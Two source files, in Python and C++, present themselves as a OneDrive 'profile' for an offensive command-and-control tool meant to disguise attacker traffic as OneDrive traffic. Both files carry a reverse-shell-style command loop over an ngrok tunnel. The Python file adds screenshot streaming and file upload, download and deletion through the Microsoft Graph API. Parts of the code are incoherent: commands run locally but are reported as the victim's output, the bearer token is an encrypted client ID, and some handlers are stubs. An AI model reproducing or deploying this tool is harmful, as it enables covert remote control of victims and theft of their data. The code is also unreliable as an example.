File: Profiles/OneDrive.py
# This script integrates OneDrive API functionality to facilitate communication between the compromised system and the attacker-controlled server, thereby potentially hiding the traffic within legitimate OneDrive communication.


import subprocess
import sys
import time
import threading
import socket
import base64
import os
import pyautogui
from pyvirtualdisplay import Display
import random
import requests
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
RESET = '\033[0m'

print(BLUE + """              
                                     .*####=                                     
                                 *##############=                                
                              .####################                              
                             ########################                            
                       =**********####################                           
                     *****************################*                          
                   **********************#########*+++++++                       
                  **************************##*++++++++++++++                    
                 =************************+====+++++++++++++++:                  
                 ********************+===========++++++++++++++:                 
                 ****************====================+++++++++++                 
                 -**********+===========================++++++++                 
                  ******===================================++++-                 
                   +==========================================+                  
                     ========================================:                   
                       .==================================+                      
                                                                                 
            ________                ________         __              
            \_____  \   ____   ____ \______ \_______|__|__  __ ____  
              /   |   \ /    \_/ __ \ |    |  \_  __ \  \  \/ // __ \ 
             /    |    \   |  \  ___/ |    `   \  | \/  |\   /\  ___/ 
             \_______  /___|  /\___  >_______  /__|  |__| \_/  \___  >
                      \/     \/     \/        \/                   \/ 
      ⠀⠀
""" + RESET)

# Function to get attacker information
def get_attacker_info():
    attacker_ip = input("[+] Enter the IP for the reverse shell: ")
    return attacker_ip

# Function to encrypt access token
def encrypt_access_token(token):
    key = input("[+] Enter your AES key (must be 16, 24, or 32 bytes long): ").encode()
    if len(key) not in [16, 24, 32]:
        print("[*] Invalid key length. AES key must be 16, 24, or 32 bytes long.")
        sys.exit(1)
    cipher = AES.new(key, AES.MODE_ECB)
    token_padded = pad(token.encode(), AES.block_size)
    return base64.b64encode(cipher.encrypt(token_padded)).decode()

# Main function
def main():
    access_token = input("[+] Enter your OneDrive Application (client) ID: ")
    secret_id = input("[+] Enter your OneDrive Secret ID: ")
    ip = get_attacker_info()
    port = input("[+] Enter the port number for the reverse shell and ngrok: ")

    print(GREEN + "[*] Starting ngrok tunnel..." + RESET)
    ngrok_process = subprocess.Popen(['ngrok', 'tcp', port])
    time.sleep(3)  # Give ngrok some time to establish the tunnel

    access_token_encrypted = encrypt_access_token(access_token)

    # Define headers for OneDrive API
    headers = {
        "Authorization": f"Bearer {access_token_encrypted}",
        "Content-Type": "application/json",
        "User-Agent": "OneDrive-API-Client/1.0",
        "Connection": "keep-alive",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "X-Drive-Client-Secret": secret_id  # Add secret ID to headers
    }

    # Create socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, int(port)))  # Bind to the port specified by the attacker
    s.listen(1)
    print(YELLOW + "[!] Waiting for incoming connection..." + RESET)
    client_socket, addr = s.accept()

    # Start shell
    shell = subprocess.Popen(['/bin/bash', '-i'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)

    # Start display
    display = Display(visible=0, size=(800, 600))
    display.start()

    # Main loop
    while True:
        command = input(RED + "[*] Bear>> " + RESET)
        if command.lower() == "exit":
            break
        
        time.sleep(random.uniform(1, 5))
        
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        stdout = result.stdout
        stderr = result.stderr

        client_socket.send(command.encode())

        if stdout:
            print(GREEN + stdout + RESET)
            print(GREEN + "[+] Command executed successfully!" + RESET)
            client_socket.send(stdout.encode())
        else:
            print(RED + "[!] No output returned from the victim's machine." + RESET)

        if stderr:
            print(RED + stderr + RESET)
            client_socket.send(stderr.encode())

        # Additional commands (screen, upload, download, get, remove, add, list_folder)
        if command.lower() == "screen":
            screen = pyautogui.screenshot()
            screen_data = base64.b64encode(screen.tobytes()).decode('utf-8')
            client_socket.send(screen_data.encode())
            while True:
                try:
                    screen = pyautogui.screenshot()
                    screen_data = base64.b64encode(screen.tobytes()).decode('utf-8')
                    client_socket.send(screen_data.encode())
                    time.sleep(0.1)
                except KeyboardInterrupt:
                    print("\nScreen session ended.")
                    break

        elif command.lower() == "upload":
            file_path = input("Enter the path of the file to upload: ")
            file_name = os.path.basename(file_path)
            with open(file_path, "rb") as f:
                file_data = f.read()
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + file_name + ":/content"
            response = requests.put(url, headers=headers, data=file_data)
            client_socket.send(response.text.encode())

        elif command.lower() == "download":
            file_path = input("Enter the path of the file to download: ")
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + file_path
            response = requests.get(url, headers=headers)
            with open(os.path.basename(file_path), "wb") as f:
                f.write(response.content)
            client_socket.send("File downloaded successfully.".encode())

        elif command.lower() == "get":
            file_path = input("Enter the path of the file: ")
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + file_path
            response = requests.get(url, headers=headers)
            client_socket.send(response.text.encode())

        elif command.lower() == "remove":
            file_path = input("Enter the path of the file to remove: ")
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + file_path
            response = requests.delete(url, headers=headers)
            client_socket.send(response.text.encode())

        elif command.lower() == "add":
            folder_path = input("Enter the path of the folder to create: ")
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + folder_path
            data = {"name": folder_path.split('/')[-1], "folder": {}}
            response = requests.post(url, headers=headers, json=data)
            client_socket.send(response.text.encode())

        elif command.lower() == "list_folder":
            folder_path = input("Enter the path of the folder to list: ")
            url = "https://graph.microsoft.com/v1.0/me/drive/root:/" + folder_path + ":/children"
            response = requests.get(url, headers=headers)
            client_socket.send(response.text.encode())

        else:
            client_socket.send(stdout.encode())
            client_socket.send(stderr.encode())

    # Close sockets and display
    client_socket.close()
    s.close()
    display.stop()

    # Terminate ngrok process
    ngrok_process.terminate()

if __name__ == "__main__":
    main()

File: Profiles/OneDrive.cpp
//g++ OneDrive.cpp -o OneDrive.o -lcurl -lssl -lcrypto -lpthread
#include <iostream>
#include <string>
#include <thread>
#include <chrono>
#include <random>
#include <cstdlib>
#include <cstdio>
#include <cstring>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <vector>
#include <fstream>
#include <sstream>
#include <curl/curl.h>
#include <openssl/evp.h>
#include <openssl/rand.h>
#include <openssl/buffer.h>

using namespace std;

const string BLUE = "\033[94m";
const string GREEN = "\033[92m";
const string RED = "\033[91m";
const string YELLOW = "\033[93m";
const string RESET = "\033[0m";

// Function to get attacker information
string get_attacker_info() {
    string attacker_ip;
    cout << "[+] Enter the IP for the reverse shell: ";
    cin >> attacker_ip;
    return attacker_ip;
}

// Function to encrypt access token
string encrypt_access_token(const string& token) {
    string key;
    cout << "[+] Enter your AES key (must be 16, 24, or 32 bytes long): ";
    cin >> key;

    if (key.length() != 16 && key.length() != 24 && key.length() != 32) {
        cout << "[*] Invalid key length. AES key must be 16, 24, or 32 bytes long." << endl;
        exit(1);
    }

    EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
    if (!ctx) {
        cerr << "Error creating EVP_CIPHER_CTX." << endl;
        exit(1);
    }

    // Initialize encryption operation
    if (EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, (unsigned char*)key.c_str(), NULL) != 1) {
        cerr << "Error initializing encryption." << endl;
        exit(1);
    }

    // Create buffer for encrypted data
    string encrypted(token.size() + EVP_CIPHER_block_size(EVP_aes_256_cbc()), '\0');
    int len;

    // Encrypt the data
    if (EVP_EncryptUpdate(ctx, (unsigned char*)&encrypted[0], &len, (unsigned char*)token.c_str(), token.length()) != 1) {
        cerr << "Error during encryption." << endl;
        exit(1);
    }

    int ciphertext_len = len;

    // Finalize the encryption
    if (EVP_EncryptFinal_ex(ctx, (unsigned char*)&encrypted[0] + len, &len) != 1) {
        cerr << "Error finalizing encryption." << endl;
        exit(1);
    }
    ciphertext_len += len;

    EVP_CIPHER_CTX_free(ctx);

    // Base64 encoding
    BIO* bio;
    BIO* b64;
    BUF_MEM* bufferPtr;

    b64 = BIO_new(BIO_f_base64());
    bio = BIO_new(BIO_s_mem());
    bio = BIO_push(b64, bio);
    BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL);
    BIO_write(bio, encrypted.c_str(), ciphertext_len);
    BIO_flush(bio);
    BIO_get_mem_ptr(bio, &bufferPtr);
    BIO_set_close(bio, BIO_NOCLOSE);
    BIO_free_all(bio);

    return string(bufferPtr->data, bufferPtr->length);
}

// Function to execute a command and return the output
string execute_command(const string& command) {
    char buffer[128];
    string result;
    FILE* pipe = popen(command.c_str(), "r");
    if (!pipe) {
        cerr << "popen() failed!" << endl;
        return "";
    }
    while (fgets(buffer, sizeof(buffer), pipe) != nullptr) {
        result += buffer;
    }
    pclose(pipe);
    return result;
}

// Main function
int main() {
    string access_token, secret_id, ip, port;
    cout << BLUE << R"(
                                     .*####=                                     
                                 *##############=                                
                              .####################                              
                             ########################                            
                       =**********####################                           
                     *****************################*                          
                   **********************#########*+++++++                       
                  **************************##*++++++++++++++                    
                 =************************+====+++++++++++++++:                  
                 ********************+===========++++++++++++++:                 
                 ****************====================+++++++++++                 
                 -**********+===========================++++++++                 
                  ******===================================++++-                 
                   +==========================================+                  
                     ========================================:                   
                       .==================================+                      
                                                                                 
            ________                ________         __              
            \_____  \   ____   ____ \______ \_______|__|__  __ ____  
              /   |   \ /    \_/ __ \ |    |  \_  __ \  \  \/ // __ \ 
             /    |    \   |  \  ___/ |    `   \  | \/  |\   /\  ___/ 
             \_______  /___|  /\___  >_______  /__|  |__| \_/  \___  >
                      \/     \/     \/        \/                   \/ 
      ⠀⠀
)" << RESET;

    cout << "[+] Enter your OneDrive Application (client) ID: ";
    cin >> access_token;
    cout << "[+] Enter your OneDrive Secret ID: ";
    cin >> secret_id;
    ip = get_attacker_info();
    cout << "[+] Enter the port number for the reverse shell and ngrok: ";
    cin >> port;

    cout << GREEN << "[*] Starting ngrok tunnel..." << RESET << endl;
    string ngrok_command = "ngrok tcp " + port;
    system(ngrok_command.c_str());
    this_thread::sleep_for(chrono::seconds(3));  // Give ngrok some time to establish the tunnel

    string access_token_encrypted = encrypt_access_token(access_token);

    // Define headers for OneDrive API
    struct curl_slist* headers = nullptr;
    headers = curl_slist_append(headers, ("Authorization: Bearer " + access_token_encrypted).c_str());
    headers = curl_slist_append(headers, "Content-Type: application/json");
    headers = curl_slist_append(headers, "User-Agent: OneDrive-API-Client/1.0");
    headers = curl_slist_append(headers, "Connection: keep-alive");
    headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br");
    headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.9");
    headers = curl_slist_append(headers, ("X-Drive-Client-Secret: " + secret_id).c_str());

    // Create socket
    int server_fd, client_socket;
    struct sockaddr_in address;
    int opt = 1;
    int addrlen = sizeof(address);

    if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == 0) {
        cerr << "Socket creation error" << endl;
        return -1;
    }

    if (setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt))) {
        cerr << "setsockopt error" << endl;
        return -1;
    }

    address.sin_family = AF_INET;
    address.sin_addr.s_addr = inet_addr(ip.c_str());
    address.sin_port = htons(stoi(port));

    if (bind(server_fd, (struct sockaddr*)&address, sizeof(address)) < 0) {
        cerr << "Bind failed" << endl;
        return -1;
    }

    if (listen(server_fd, 3) < 0) {
        cerr << "Listen failed" << endl;
        return -1;
    }

    cout << YELLOW << "[!] Waiting for incoming connection..." << RESET << endl;
    if ((client_socket = accept(server_fd, (struct sockaddr*)&address, (socklen_t*)&addrlen)) < 0) {
        cerr << "Accept failed" << endl;
        return -1;
    }

    // Main loop
    while (true) {
        string command;
        cout << RED << "[*] Bear>> " << RESET;
        getline(cin, command);
        if (command == "exit") {
            break;
        }

        this_thread::sleep_for(chrono::milliseconds(rand() % 4000 + 1000));

        string result = execute_command(command);
        send(client_socket, command.c_str(), command.length(), 0);

        if (!result.empty()) {
            cout << GREEN << result << RESET;
            cout << GREEN << "[+] Command executed successfully!" << RESET;
            send(client_socket, result.c_str(), result.length(), 0);
        } else {
            cout << RED << "[!] No output returned from the victim's machine." << RESET;
        }

        // Additional commands (screen, upload, download, get, remove, add, list_folder)
        // Implement additional command handling here...
    }

    // Close sockets
    close(client_socket);
    close(server_fd);

    return 0;
}

